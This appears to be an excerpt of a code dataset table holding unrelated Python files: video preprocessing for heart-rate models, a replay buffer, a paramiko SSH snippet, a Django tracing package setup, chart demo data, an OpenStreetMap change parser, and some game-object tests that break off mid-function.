id
stringlengths 2
8
| text
stringlengths 16
264k
| dataset_id
stringclasses 1
value |
---|---|---|
4867699
|
<gh_stars>0
import multiprocessing
import os
import h5py
from utils.image_preprocess import Deepphys_preprocess_Video, PhysNet_preprocess_Video
from utils.text_preprocess import Deepphys_preprocess_Label, PhysNet_preprocess_Label
def preprocessing(save_root_path: str = "/media/hdd1/dy/dataset/",
model_name: str = "DeepPhys",
data_root_path: str = "/media/hdd1/",
dataset_name: str = "UBFC",
train_ratio: float = 0.8):
"""
:param save_root_path: save file destination path
:param model_name: select preprocessing method
:param data_root_path: data set root path
:param dataset_name: data set name(ex. UBFC, COFACE)
:param train_ratio: data split [ train ratio : 1 - train ratio]
:return:
"""
print("preprocessing start!")
dataset_root_path = data_root_path + dataset_name
manager = multiprocessing.Manager()
return_dict = manager.dict()
data_list = [data for data in os.listdir(dataset_root_path) if data.__contains__("subject")]
process = []
print(data_list)
# multiprocessing
for index, data_path in enumerate(data_list):
proc = multiprocessing.Process(target=preprocess_Dataset,
args=(dataset_root_path + "/" + data_path, True, model_name, return_dict))
process.append(proc)
proc.start()
for proc in process:
proc.join()
train = int(len(return_dict.keys()) * train_ratio) # split dataset
train_file = h5py.File(save_root_path + model_name + "_" + dataset_name + "_train.hdf5", "w")
for index, data_path in enumerate(return_dict.keys()[:train]):
dset = train_file.create_group(data_path)
dset['preprocessed_video'] = return_dict[data_path]['preprocessed_video']
dset['preprocessed_label'] = return_dict[data_path]['preprocessed_label']
train_file.close()
test_file = h5py.File(save_root_path + model_name + "_" + dataset_name + "_test.hdf5", "w")
for index, data_path in enumerate(return_dict.keys()[train:]):
dset = test_file.create_group(data_path)
dset['preprocessed_video'] = return_dict[data_path]['preprocessed_video']
dset['preprocessed_label'] = return_dict[data_path]['preprocessed_label']
test_file.close()
def preprocess_Dataset(path, flag, model_name, return_dict):
"""
:param path: dataset path
:param flag: face detect flag
:param model_name: select preprocessing method
:param return_dict: : preprocessed image, label
"""
if model_name == "DeepPhys":
rst, preprocessed_video = Deepphys_preprocess_Video(path + "/vid.avi", flag)
elif model_name == "PhysNet" or model_name == "PhysNet_LSTM":
rst, preprocessed_video = PhysNet_preprocess_Video(path + "/vid.avi", flag)
if not rst: # can't detect face
return
if model_name == "DeepPhys":
preprocessed_label = Deepphys_preprocess_Label(path + "/ground_truth.txt")
elif model_name == "PhysNet" or model_name == "PhysNet_LSTM":
preprocessed_label = PhysNet_preprocess_Label(path + "/ground_truth.txt")
return_dict[path.split("/")[-1]] = {'preprocessed_video': preprocessed_video,
'preprocessed_label': preprocessed_label}
|
StarcoderdataPython
|
3546454
|
import numpy as np
import heapq
import random
from itertools import count
import torch
class Transition_tuple():
def __init__(self, state, action, action_mean, reward, curiosity, next_state, done_mask, t):
#expects as list of items for each initalization variable
self.state = np.array(state)
self.action = np.array(action)
self.action_mean = np.array(action_mean)
self.reward = np.array(reward)
self.curiosity = np.array(curiosity)
self.next_state = np.array(next_state)
self.done_mask = np.array(done_mask)
self.t = np.array(t)
def get_all_attributes(self):
return [self.state, self.action, self.action_mean, self.reward, self.curiosity, self.next_state, self.done_mask, self.t]
class Curious_Reservoir():
def __init__(self, capacity=10000, ):
self.capacity = capacity
self.storage = [[]]
self.residual_buffer = []
self.tiebreaker = count()
self.current_index = 0
self.no_tasks = 1
self.individual_buffer_capacity = capacity
self.time = 0
self.split_sizes = [0]
def push(self, state, action, action_mean, reward, curiosity, next_state, done_mask, tiebreaker):
self.time = next(self.tiebreaker)
data = (state, action, action_mean, reward, curiosity, next_state, done_mask, tiebreaker)
if str(type(curiosity)) != torch.Tensor:
priority = curiosity
else:
priority = curiosity.item()
if tiebreaker == None:
tiebreaker = self.time
d = (priority, tiebreaker, data)
old_data = None
if len(self.storage[self.current_index]) < self.individual_buffer_capacity:
heapq.heappush(self.storage[self.current_index], d)
pushed = True
old_data = None
elif priority > self.storage[self.current_index][0][0]:
old_data = heapq.heapreplace(self.storage[self.current_index], d)
pushed = True
else:
pushed = False
if pushed == True:
if len(self.residual_buffer) != 0:
self.residual_buffer.pop(0)
if pushed == False:
return pushed, data
else:
return pushed, old_data
def get_total_buffer_data(self):
S = []
for buff in self.storage:
S += buff
S += self.residual_buffer
return S
def sample(self, batch_size):
indices = self.get_sample_indices(batch_size)
state, action, action_mean, reward, curiosity, next_state, done_mask, t_array = self.encode_sample(
indices=indices)
return Transition_tuple(state, action, action_mean, reward, curiosity, next_state, done_mask, t_array)
def encode_sample(self, indices):
state, action, action_mean, reward, curiosity, next_state, done_mask, t_array = [], [], [], [], [], [], [], []
for (j,idxs) in enumerate(indices):
for i in idxs:
if j == 0:
data = self.residual_buffer[i][2]
else:
data = self.storage[j-1][i][2]
s, a, a_m, r, c, n_s, d, t = data
state.append(s)
action.append(a)
action_mean.append(a_m)
reward.append(r)
curiosity.append(c)
next_state.append(n_s)
done_mask.append(d)
t_array.append(t)
return state, action, action_mean, reward, curiosity, next_state, done_mask, t_array
def get_sample_indices(self, batch_size):
prop = self.get_proportion()
batch_sizes = []
temp = 0
#for i in range(len(self.storage)-1):
for i in range(len(self.storage)):
temp += int(batch_size*prop[i])
batch_sizes.append(int(batch_size*prop[i]))
batch_sizes.append(batch_size-temp) #this for residual buffer
indices = []
for (i,buff) in enumerate(self.storage):
if len(buff) < self.individual_buffer_capacity:
indices.append(np.random.choice(len(buff), batch_sizes[i]))
else:
indices.append(np.random.choice(self.individual_buffer_capacity, batch_sizes[i]))
#for residual buffer
buff = self.residual_buffer
if len(buff) != 0:
indices.insert(0, np.random.choice(len(buff), batch_sizes[-1]))
else:
indices.insert(0, np.array([]))
#indices at which we can beform task split for IRM
#(including the residual buffer, so u may ignore it)
"""
self.split_indices = []
curr_index = 0
for i in range(len(self.storage)):
curr_index = curr_index + len(indices[i])
self.split_indices.append(curr_index)
"""
self.split_sizes = [len(inx) for inx in indices]
self.debug = [prop, batch_size, self.split_sizes, batch_sizes, len(self.residual_buffer) ]
return indices
def get_all_buff_sizes(self):
buff_size = [len(buff) for buff in self.storage]
return buff_size
def get_proportion(self):
size = self.__len__()
if size == 0:
return [1.0]
prop = []
for buff in self.storage:
prop.append(len(buff)/size)
prop.append(len(self.residual_buffer)/size)
return prop
def __len__(self):
l = 0
for buff in self.storage:
l += len(buff)
l += len(self.residual_buffer)
return l
|
StarcoderdataPython
|
1802337
|
import paramiko
import time
ip = '172.16.17.32'
username = 'pyclass'
password = '<PASSWORD>'
remote_conn=paramiko.SSHClient()
# avoid issues with not trusted targets
remote_conn.set_missing_host_key_policy(paramiko.AutoAddPolicy())
remote_conn.connect(ip, username=username, password=password, look_for_keys=False, allow_agent=False)
remote_conn02 = remote_conn.invoke_shell()
output = remote_conn02.recv(1000)
print output
remote_conn02.send("conf t\n")
output = remote_conn02.recv(5000)
print output
|
StarcoderdataPython
|
6429870
|
<filename>setup.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
from setuptools import setup, find_packages
MIDDLEWARE_BASE_DIR = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(MIDDLEWARE_BASE_DIR, 'README.md')) as f:
long_description = f.read()
setup(
name='shein-django-jaeger-middleware',
license='MIT',
version='0.2.9',
description='python(django) tracing middleware tool: django-jaeger-middleware',
long_description=long_description,
long_description_content_type="text/markdown",
author='zhangpanpan',
author_email='<EMAIL>',
url='https://github.com/lpf32/shein-django-jaeger-middleware',
packages=find_packages(),
install_requires=[
"jaeger_client",
"opentracing",
"requests"
],
keywords=['django', 'jaeger', 'jaegertracing', 'requests'],
classifiers=[
"Framework :: Django",
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
python_requires='>=3.6',
zip_safe=False
)
|
StarcoderdataPython
|
8102501
|
<gh_stars>100-1000
from .models import Account
DB_HOST = ["localhost"]
DB_PORT = 27017
def get_db(db_name):
import pymongo
DB_HOST = ["localhost"]
DB_PORT = 27017
db = pymongo.Connection(DB_HOST, DB_PORT)[db_name]
return db
def get_mongo_cursor(db_name, collection_name, max_docs=100):
import pymongo
db = pymongo.Connection(host=DB_HOST,
port=DB_PORT)[db_name]
collection = db[collection_name]
cursor = collection.find()
count = cursor.count
if callable(count):
count = count()
if count >= max_docs:
cursor = cursor[0:max_docs]
return cursor
data = [
['Year', 'Sales', 'Expenses', 'Items Sold', 'Net Profit'],
['2004', 1000, 400, 100, 600],
['2005', 1170, 460, 120, 710],
['2006', 660, 1120, 50, -460],
['2007', 1030, 540, 100, 490],
]
candlestick_data = [['Mon', 20, 28, 38, 45],
['Tue', 31, 38, 55, 66],
['Wed', 50, 55, 77, 80],
['Thu', 77, 77, 66, 50],
['Fri', 68, 66, 22, 15]]
# TODO: Come up with a better example
scatter_multi_series_data = [
['state','country','Rainfall', 'Precipitation'],
['Uttar Pradesh','India',1, 2],
['Bihar','India',2, 3],
['Telangana','India',5, 7],
['Lahore','Pakistan',9,8],
['Hyderabad','Pakistan',8,7],
['Lahore','Pakistan',3,11]
]
# TODO: Come up with a better example
scatter_single_series_data = [
['Leader', 'Rainfall', 'Precipitation'],
['Trump', 1, 2],
['Clinton', 2, 3],
['Trumps', 5, 7],
['George', 6, 9],
['Alex', 7, 4],
['Donald', 7, 8],
]
treemap_data = [
['Location', 'Parent', 'Market trade volume (size)', 'Market increase/decrease (color)'],
['Global', None, 0, 0],
['America', 'Global', 0, 0],
['Europe', 'Global', 0, 0],
['Asia', 'Global', 0, 0],
['Australia', 'Global', 0, 0],
['Africa', 'Global', 0, 0],
['Brazil', 'America', 11, 10],
['USA', 'America', 52, 31],
['Mexico', 'America', 24, 12],
['Canada', 'America', 16, -23],
['France', 'Europe', 42, -11],
['Germany', 'Europe', 31, -2],
['Sweden', 'Europe', 22, -13],
['Italy', 'Europe', 17, 4],
['UK', 'Europe', 21, -5],
['China', 'Asia', 36, 4],
['Japan', 'Asia', 20, -12],
['India', 'Asia', 40, 63],
['Laos', 'Asia', 4, 34],
['Mongolia', 'Asia', 1, -5],
['Israel', 'Asia', 12, 24],
['Iran', 'Asia', 18, 13],
['Pakistan', 'Asia', 11, -52],
['Egypt', 'Africa', 21, 0],
['S. Africa', 'Africa', 30, 43],
['Sudan', 'Africa', 12, 2],
['Congo', 'Africa', 10, 12],
['Zaire', 'Africa', 8, 10]]
# map_data = [
# ['Country', 'Value'],
# ['fo', 0],
# ['um', 1],
# ['us', 2],
# ['jp', 3],
# ['sc', 4],
# ['in', 5],
# ['fr', 6],
# ['fm', 7],
# ['cn', 8],
# ['pt', 9],
# ['sw', 10],
# ['sh', 11],
# ['br', 12],
# ['ki', 13],
# ['ph', 14],
# ['mx', 15],
# ['es', 16],
# ['bu', 17],
# ['mv', 18],
# ['sp', 19],
# ['gb', 20],
# ['gr', 21],
# ['as', 22],
# ['dk', 23],
# ['gl', 24],
# ['gu', 25],
# ['mp', 26],
# ['pr', 27],
# ['vi', 28],
# ['ca', 29],
# ['st', 30],
# ['cv', 31],
# ['dm', 32],
# ['nl', 33],
# ['jm', 34],
# ['ws', 35],
# ['om', 36],
# ['vc', 37],
# ['tr', 38],
# ['bd', 39],
# ['lc', 40],
# ['nr', 41],
# ['no', 42],
# ['kn', 43],
# ['bh', 44],
# ['to', 45],
# ['fi', 46],
# ['id', 47],
# ['mu', 48],
# ['se', 49],
# ['tt', 50],
# ['my', 51],
# ['pa', 52],
# ['pw', 53],
# ['tv', 54],
# ['mh', 55],
# ['cl', 56],
# ['th', 57],
# ['gd', 58],
# ['ee', 59],
# ['ad', 60],
# ['tw', 61],
# ['bb', 62],
# ['it', 63],
# ['mt', 64],
# ['vu', 65],
# ['sg', 66],
# ['cy', 67],
# ['lk', 68],
# ['km', 69],
# ['fj', 70],
# ['ru', 71],
# ['va', 72],
# ['sm', 73],
# ['kz', 74],
# ['az', 75],
# ['tj', 76],
# ['ls', 77],
# ['uz', 78],
# ['ma', 79],
# ['co', 80],
# ['tl', 81],
# ['tz', 82],
# ['ar', 83],
# ['sa', 84],
# ['pk', 85],
# ['ye', 86],
# ['ae', 87],
# ['ke', 88],
# ['pe', 89],
# ['do', 90],
# ['ht', 91],
# ['pg', 92],
# ['ao', 93],
# ['kh', 94],
# ['vn', 95],
# ['mz', 96],
# ['cr', 97],
# ['bj', 98],
# ['ng', 99],
# ['ir', 100],
# ['sv', 101],
# ['sl', 102],
# ['gw', 103],
# ['hr', 104],
# ['bz', 105],
# ['za', 106],
# ['cf', 107],
# ['sd', 108],
# ['cd', 109],
# ['kw', 110],
# ['de', 111],
# ['be', 112],
# ['ie', 113],
# ['kp', 114],
# ['kr', 115],
# ['gy', 116],
# ['hn', 117],
# ['mm', 118],
# ['ga', 119],
# ['gq', 120],
# ['ni', 121],
# ['lv', 122],
# ['ug', 123],
# ['mw', 124],
# ['am', 125],
# ['sx', 126],
# ['tm', 127],
# ['zm', 128],
# ['nc', 129],
# ['mr', 130],
# ['dz', 131],
# ['lt', 132],
# ['et', 133],
# ['er', 134],
# ['gh', 135],
# ['si', 136],
# ['gt', 137],
# ['ba', 138],
# ['jo', 139],
# ['sy', 140],
# ['mc', 141],
# ['al', 142],
# ['uy', 143],
# ['cnm', 144],
# ['mn', 145],
# ['rw', 146],
# ['so', 147],
# ['bo', 148],
# ['cm', 149],
# ['cg', 150],
# ['eh', 151],
# ['rs', 152],
# ['me', 153],
# ['tg', 154],
# ['la', 155],
# ['af', 156],
# ['ua', 157],
# ['sk', 158],
# ['jk', 159],
# ['bg', 160],
# ['qa', 161],
# ['li', 162],
# ['at', 163],
# ['sz', 164],
# ['hu', 165],
# ['ro', 166],
# ['ne', 167],
# ['lu', 168],
# ['ad', 169],
# ['ci', 170],
# ['lr', 171],
# ['bn', 172],
# ['iq', 173],
# ['ge', 174],
# ['gm', 175],
# ['ch', 176],
# ['td', 177],
# ['kv', 178],
# ['lb', 179],
# ['dj', 180],
# ['bi', 181],
# ['sr', 182],
# ['il', 183],
# ['ml', 184],
# ['sn', 185],
# ['gn', 186],
# ['zw', 187],
# ['pl', 188],
# ['mk', 189],
# ['py', 190],
# ['by', 191],
# ['ca', 192],
# ['bf', 193],
# ['na', 194],
# ['ly', 195],
# ['tn', 196],
# ['bt', 197],
# ['md', 198],
# ['ss', 199],
# ['bw', 200],
# ['bs', 201],
# ['nz', 202],
# ['cu', 203],
# ['ec', 204],
# ['au', 205],
# ['ve', 206],
# ['sb', 207],
# ['mg', 208],
# ['is', 209],
# ['eg', 210],
# ['kg', 211],
# ['np', 212]
# ]
map_data = [
['Country', 'Value'],
['fo', 0],
['um', 1],
['us', 2],
['jp', 3],
['sc', 4],
['in', 5],
['fr', 6],
['fm', 7],
['cn', 8],
['pt', 9],
['sw', 10],
['sh', 11],
['br', 12],
['ki', 13],
['ph', 14],
['mx', 15],
['es', 16],
['bu', 17],
['mv', 18],
['sp', 19],
['gb', 20],
['gr', 21],
['as', 22],
['dk', 23],
['gl', 24],
['gu', 25],
['mp', 26],
['pr', 27],
['vi', 28],
['ca', 29],
['st', 30],
['cv', 31],
['dm', 32],
['nl', 33],
['jm', 34],
['ws', 35],
['om', 36],
['vc', 37],
['tr', 38],
['bd', 39],
['lc', 40],
['nr', 41],
['no', 42],
['kn', 43],
['bh', 44],
['to', 45],
['fi', 46],
['id', 47],
['mu', 48],
['se', 49],
['tt', 50],
['my', 51],
['pa', 52],
['pw', 53],
['tv', 54],
['mh', 55],
['cl', 56],
['th', 57],
['gd', 58],
['ee', 59],
['ad', 60],
['tw', 61],
['bb', 62],
['it', 63],
['mt', 64],
['vu', 65],
['sg', 66],
['cy', 67],
['lk', 68],
['km', 69],
['fj', 70],
['ru', 71],
['va', 72],
['sm', 73],
['kz', 74],
['az', 75],
['tj', 76],
['ls', 77],
['uz', 78],
['ma', 79],
['co', 80],
['tl', 81],
['tz', 82],
['ar', 83],
['sa', 84],
['pk', 85],
['ye', 86],
['ae', 87],
['ke', 88],
['pe', 89],
['do', 90],
['ht', 91],
['pg', 92],
['ao', 93],
['kh', 94],
['vn', 95],
['mz', 96],
['cr', 97],
['bj', 98],
['ng', 99]
]
map_data_us_multi_series_lat_lon = [
['Latitude', 'Longitude', 'Winner', 'Seats'],
[32.380120, -86.300629, 'Trump', 10],
[58.299740, -134.406794, 'Trump', 10],
[33.448260, -112.075774, 'Trump', 10],
[34.748655, -92.274494, 'Clinton', 20],
[38.579065, -121.491014, 'Clinton', 20],
]
map_data_us_multi_series = [
['State', 'Winner', 'Seats'],
['us-nj', 'Trump', 10],
['us-ri', 'Trump', 10],
['us-ma', 'Trump', 10],
['us-ct', 'Clinton', 20],
['us-md', 'Clinton', 20],
['us-ny', 'Clinton', 20],
['us-de', 'Trump', 20],
['us-fl', 'Trump', 20],
['us-oh', 'Trump', 20],
['us-pa', 'Trump', 20],
['us-li', 'Trump', 20],
['us-ca', 'Trump', 20],
['us-hi', 'Trump', 20],
['us-va', 'Trump', 31],
['us-mi', 'Trump', 31],
['us-in', 'Trump', 31],
['us-nc', 'Trump', 31],
['us-ga', 'Trump', 31],
['us-tn', 'Trump', 31],
['us-nh', 'Trump', 31],
['us-sc', 'Trump', 31],
['us-la', 'Trump', 31],
['us-ky', 'Trump', 31],
['us-wi', 'Trump', 12],
['us-wa', 'Trump', 12],
['us-al', 'Clinton', 12],
['us-mo', 'Clinton', 12],
['us-tx', 'Clinton', 45],
['us-wv', 'Clinton', 45],
]
map_data_us_lat_lon = [
['Latitude', 'Longitude', 'Population'],
[32.380120, -86.300629, 900],
[58.299740, -134.406794, 387],
[33.448260, -112.075774, 313],
]
map_data_india_lat_lon = [
['Latitude', 'Longitude', 'Population'],
[25.4851484, 83.2104426, 900],
[27.7126407, 78.7391187, 387],
[28.2699017, 79.1604971, 313],
]
map_data_us = [
['State', 'Population'],
['us-nj', 438],
['us-ri', 387],
['us-ma', 313],
['us-ct', 271],
['us-md', 209],
['us-ny', 195],
['us-de', 155],
['us-fl', 114],
['us-oh', 107],
['us-pa', 106],
['us-li', 86],
['us-ca', 84],
['us-hi', 73],
['us-va', 69],
['us-mi', 68],
['us-in', 65],
['us-nc', 64],
['us-ga', 55],
['us-tn', 53],
['us-nh', 53],
['us-sc', 51],
['us-la', 40],
['us-ky', 39],
['us-wi', 38],
['us-wa', 34],
['us-al', 34],
['us-mo', 31],
['us-tx', 31],
['us-wv', 29],
['us-vt', 25],
['us-mn', 24],
['us-ms', 23],
['us-ia', 20],
['us-ar', 20],
['us-ok', 19],
['us-az', 17],
['us-co', 16],
['us-me', 16],
['us-or', 14],
['us-ks', 13],
['us-ut', 11],
['us-ne', 9],
['us-nv', 7],
['us-id', 6],
['us-nm', 6],
['us-sd', 4],
['us-nd', 4],
['us-mt', 2],
['us-wy', 2],
['us-ak', 1],
]
map_data_us_point = [
['Lat', 'Lon', 'Name', 'Date'],
[46.8797, -110.3626, 'trump', '25th February'],
[41.4925, -99.9018, 'trump', '26th February'],
[45.4925, -89.9018, 'trump', '27th February'],
[32.1656, -82.9001, 'clinton', '25th February'],
[33.1656, -81.9001, 'clinton', '26th February'],
]
mongo_series_object_1 = [[440, 39],
[488, 29.25],
[536, 28],
[584, 29],
[632, 33.25],
[728, 28.5],
[776, 33.25],
[824, 28.5],
[872, 31],
[920, 30.75],
[968, 26.25]]
mongo_series_object_2 = [[400, 4],
[488, 0],
[536, 20],
[584, 8],
[632, 2],
[680, 36],
[728, 0],
[776, 0],
[824, 0],
[872, 4],
[920, 1],
[968, 0]]
mongo_data = [{'data': mongo_series_object_1, 'label': 'hours'},
{'data': mongo_series_object_2, 'label': 'hours'}]
def create_demo_accounts():
Account.objects.all().delete()
# Create some rows
Account.objects.create(year="2004", sales=1000,
expenses=400, ceo="Welch")
Account.objects.create(year="2005", sales=1170,
expenses=460, ceo="Jobs")
Account.objects.create(year="2006", sales=660,
expenses=1120, ceo="Page")
Account.objects.create(year="2007", sales=1030,
expenses=540, ceo="Welch")
Account.objects.create(year="2008", sales=2030,
expenses=1540, ceo="Zuck")
Account.objects.create(year="2009", sales=2230,
expenses=1840, ceo="Cook")
def create_demo_mongo():
accounts = get_db("accounts")
docs = accounts.docs
docs.drop()
docs = accounts.docs
header = data[0]
data_only = data[1:]
for row in data_only:
docs.insert(dict(zip(header, row)))
heatmap_data = [['Name', 'Yash', 'Akshar', 'Ashok','Shabda'],
['Uttar Pradesh',1000,2000,3000,4000],
['Bihar',2000,5000,8000,9800],
['Hyderabad',10000,9855,6000,2000],
['Banglore',98652,78563,8522,2000],
['Chennai',98745,8563,5236,2000],
['Vizag',9875,7000,966,2300],
['Maharashtra',9000,16789,9087,6789],
['Punjab',3467,8900,5670,9900]
]
funnel_data = [['Unique users', 'Counts'],
['Website visits', 654],
['Downloads', 4064],
['Requested price list', 1987],
['Invoice sent', 976],
['Finalized', 846]
]
treemap_data_highcharts = [["Continent","Country","Cause","Death Rate"],
["Asia","India","Cardiovascular Disease",10],
["Asia","India","Road Accident",5],
["Asia","India","Cancer",3],
["Asia","China","Cardiovascular Disease",9],
["Asia","China","Road Accident",6],
["Asia","China","Cancer",1],
["South Ameria","Brazil","Cardiovascular Disease",11],
["South Ameria","Brazil","Road Accident",3],
["South Ameria","Brazil","Cancer",2],
["South Ameria","Uruguay","Cardiovascular Disease",12],
["South Ameria","Uruguay","Road Accident",9],
["South Ameria","Uruguay","Cancer",8],
["Europe","France","Cardiovascular Disease",9],
["Europe","France","Road Accident",4],
["Europe","France","Cancer",6]
]
piechart_data_highcharts = [["Country","Cause","Death Rate"],
["India","Cardiovascular Disease",10],
["India","Road Accident",5],
["India","Cancer",3],
["China","Cardiovascular Disease",9],
["China","Road Accident",6],
["China","Cancer",1],
["Brazil","Cardiovascular Disease",11],
["Brazil","Road Accident",3],
["Brazil","Cancer",2],
["Uruguay","Cardiovascular Disease",12],
["Uruguay","Road Accident",9],
["Uruguay","Cancer",8],
["France","Cardiovascular Disease",9],
["France","Road Accident",4],
["France","Cancer",6]
]
bubble_chart_data_multi = [["Grade","Country","Sugar Consumption","Fat Consumption","GDP"],
["A","India",10,15,90],
["B","India",11,20,19],
["C","India",12,15,70],
["D","India",13,30,39],
["E","India",14,12,9],
["F","India",15,5,98],
["H","Japan",18,60,110],
["I","Japan", 41, 16, 140],
["J","Japan", 47, 36, 150],
["K","Japan", 61, 56, 70],
["L","Japan", 74, 36, 210],
["M","Japan", 10, 46, 90],
["N","Japan", 30, 26, 100],
["O","China",14,18,100],
["A","China", 9, 17, 10],
["B","China", 51, 67, 200],
["C","China", 12, 27, 160],
["D","China", 42, 67, 86],
["E","China", 30, 97, 20],
["F","China", 16, 67, 90],
["L","USA",56,20,120],
["K","USA", 32, 23, 220],
["A","USA", 15, 85, 320],
["S","USA", 48, 10, 20],
["D","USA", 30, 96, 150],
["K","USA", 14, 22, 160],
["P","USA", 39, 21, 100],
["O","USA", 44, 29, 150]]
bubble_chart_data_single = [["Country","Sugar Consumption","Fat Consumption","GDP"],
["India",10,15,90],
["USA",11,20,19],
["China",12,15,70],
["Japan",13,30,39],
["Pakistan",14,12,9],
["Srilanka",15,5,98],
["Indonesia",16,35,150]]
|
StarcoderdataPython
|
11303754
|
<filename>osm_validator/osm_change.py
from datetime import datetime
from io import BytesIO
from lxml import etree
class Node(object):
__slots__ = ('id', 'version', 'timestamp', 'uid', 'user', 'changeset', 'lat', 'lon', 'tags')
def __init__(self, *, id, version, timestamp, uid, user, changeset, lat, lon, tags):
self.id = id
self.version = version
self.timestamp = timestamp
self.uid = uid
self.user = user
self.changeset = changeset
self.lat = lat
self.lon = lon
self.tags = tags
def __eq__(self, other):
return self.id, self.version == other.id, other.version
def __hash__(self):
return hash((self.id, self.version))
@staticmethod
def from_xml(item):
id = int(item.attrib['id'])
version = int(item.attrib['version'])
timestamp = datetime.strptime(item.attrib['timestamp'], '%Y-%m-%dT%H:%M:%SZ')
uid = int(item.attrib['uid'])
user = item.attrib['user']
changeset = int(item.attrib['changeset'])
lat = float(item.attrib['lat'])
lon = float(item.attrib['lon'])
tags = {x.attrib['k']: x.attrib['v'] for x in item.getchildren()}
return Node(
id=id,
version=version,
timestamp=timestamp,
uid=uid,
user=user,
changeset=changeset,
lat=lat,
lon=lon,
tags=tags,
)
class Way(object):
__slots__ = ('id', 'version', 'timestamp', 'uid', 'user', 'changeset', 'nodes', 'tags')
def __init__(self, *, id, version, timestamp, uid, user, changeset, nodes, tags):
self.id = id
self.version = version
self.timestamp = timestamp
self.uid = uid
self.user = user
self.changeset = changeset
self.nodes = nodes
self.tags = tags
def __eq__(self, other):
return self.id, self.version == other.id, other.version
def __hash__(self):
return hash((self.id, self.version))
@staticmethod
def from_xml(item):
id = int(item.attrib['id'])
version = int(item.attrib['version'])
timestamp = datetime.strptime(item.attrib['timestamp'], '%Y-%m-%dT%H:%M:%SZ')
uid = int(item.attrib['uid'])
user = item.attrib['user']
changeset = int(item.attrib['changeset'])
nodes = []
tags = {}
for x in item.getchildren():
if x.tag == 'nd':
nodes.append(int(x.attrib['ref']))
else:
tags[x.attrib['k']] = x.attrib['v']
return Way(
id=id,
version=version,
timestamp=timestamp,
uid=uid,
user=user,
changeset=changeset,
nodes=tuple(nodes),
tags=tags,
)
class Member(object):
__slots__ = ('type', 'ref', 'role')
def __init__(self, *, type, ref, role):
self.type = type
self.ref = ref
self.role = role
def __eq__(self, other):
return self.type, self.ref, self.role == other.type, other.id, other.role
def __hash__(self):
return hash((self.type, self.ref, self.role))
class Relation(object):
__slots__ = ('id', 'version', 'timestamp', 'uid', 'user', 'changeset', 'members', 'tags')
def __init__(self, *, id, version, timestamp, uid, user, changeset, members, tags):
self.id = id
self.version = version
self.timestamp = timestamp
self.uid = uid
self.user = user
self.changeset = changeset
self.members = members
self.tags = tags
def __eq__(self, other):
return self.id, self.version == other.id, other.version
def __hash__(self):
return hash((self.id, self.version))
@staticmethod
def from_xml(item):
id = int(item.attrib['id'])
version = int(item.attrib['version'])
timestamp = datetime.strptime(item.attrib['timestamp'], '%Y-%m-%dT%H:%M:%SZ')
uid = int(item.attrib['uid'])
user = item.attrib['user']
changeset = int(item.attrib['changeset'])
members = []
tags = {}
for x in item.getchildren():
if x.tag == 'member':
members.append(Member(
type=x.attrib['type'],
ref=int(x.attrib['ref']),
role=x.attrib['role'],
))
else:
tags[x.attrib['k']] = x.attrib['v']
return Relation(
id=id,
version=version,
timestamp=timestamp,
uid=uid,
user=user,
changeset=changeset,
members=tuple(members),
tags=tags,
)
class OsmChange(object):
__slots__ = ('changeset',
'created_nodes', 'created_ways', 'created_relations',
'deleted_nodes', 'deleted_ways', 'deleted_relations',
'modified_nodes', 'modified_ways', 'modified_relations')
def __init__(self, changeset):
self.changeset = changeset
self.created_nodes = set()
self.created_ways = set()
self.created_relations = set()
self.deleted_nodes = set()
self.deleted_ways = set()
self.deleted_relations = set()
self.modified_nodes = set()
self.modified_ways = set()
self.modified_relations = set()
def __eq__(self, other):
return self.changeset == other.changeset
def __hash__(self):
return hash(self.changeset)
class OsmChangeList(object):
def __init__(self, changes, affected_node_ids, affected_way_ids, affected_rel_ids):
self.changes = changes
self.affected_node_ids = affected_node_ids
self.affected_way_ids = affected_way_ids
self.affected_rel_ids = affected_rel_ids
def parse_osc(file):
match_type = {
'node': Node,
'way': Way,
'relation': Relation,
}
match_path = {
('create', 'node'): 'created_nodes',
('create', 'way'): 'created_ways',
('create', 'relation'): 'created_relations',
('delete', 'node'): 'deleted_nodes',
('delete', 'way'): 'deleted_ways',
('delete', 'relation'): 'deleted_relations',
('modify', 'node'): 'modified_nodes',
('modify', 'way'): 'modified_ways',
('modify', 'relation'): 'modified_relations',
}
changes = {}
affected_ids = {
'node': set(),
'way': set(),
'relation': set(),
}
for event, element in etree.iterparse(BytesIO(file)):
if element.tag not in ['modify', 'delete', 'create']:
continue
for item in element.getchildren():
instance = match_type[item.tag].from_xml(item)
if instance.changeset not in changes:
changes[instance.changeset] = OsmChange(instance.changeset)
getattr(changes[instance.changeset], match_path[(element.tag, item.tag)]).add(instance)
affected_ids[item.tag].add(instance.id)
return OsmChangeList(
tuple(sorted(changes.values(), key=lambda c: c.changeset)),
affected_ids['node'], affected_ids['way'], affected_ids['relation'],
)
|
StarcoderdataPython
|
8140955
|
print('===== 061 =====')
t1 = float(input('digite o primeiro termo: '))
r = float(input('digite a razão: '))
cont = 1
t = t1
while cont <= 10:
print(f'{int(t)}', end=' ')
cont += 1
t += r
print('FIM')
|
StarcoderdataPython
|
6642174
|
<gh_stars>0
import pytest
from ppb.errors import BadChildException
from ppb.gomlib import GameObject, Children
class TestEnemy:
pass
class TestPlayer:
pass
class TestSubclassPlayer(TestPlayer):
pass
class TestSprite:
pass
def containers():
yield GameObject()
def players():
yield TestPlayer()
yield TestSubclassPlayer()
def players_and_containers():
for player in players():
for container in containers():
yield player, container
@pytest.fixture()
def enemies():
return TestEnemy(), TestEnemy()
@pytest.mark.parametrize("player, container", players_and_containers())
def test_add_methods(container, player, enemies):
container.add(player)
for group, sprite in zip(("red", "blue"), enemies):
container.add(sprite, [group])
assert player in container
for enemy in enemies:
assert enemy in container
@pytest.mark.parametrize("container", containers())
def test_add_type_to_game_object(container):
with pytest.raises(BadChildException):
container.add(TestSprite)
@pytest.mark.parametrize("player, container", players_and_containers())
def test_get_methods(container, player, enemies):
sprite = TestSprite()
container.add(player, ["red"])
container.add(enemies[0])
container.add(enemies[1], ["red"])
container.add(sprite)
assert set(container.get(kind=TestEnemy)) == set(enemies)
assert set(container.get(kind=TestPlayer)) == {player}
assert set(container.get(kind=TestSprite)) == {sprite}
assert set(container.get(tag="red")) == {player, enemies[1]}
assert set(container.get(tag="this doesn't exist")) == set()
with pytest.raises(TypeError):
container.get()
@pytest.mark.parametrize("player, container", players_and_containers())
def test_get_with_string_tags(container, player):
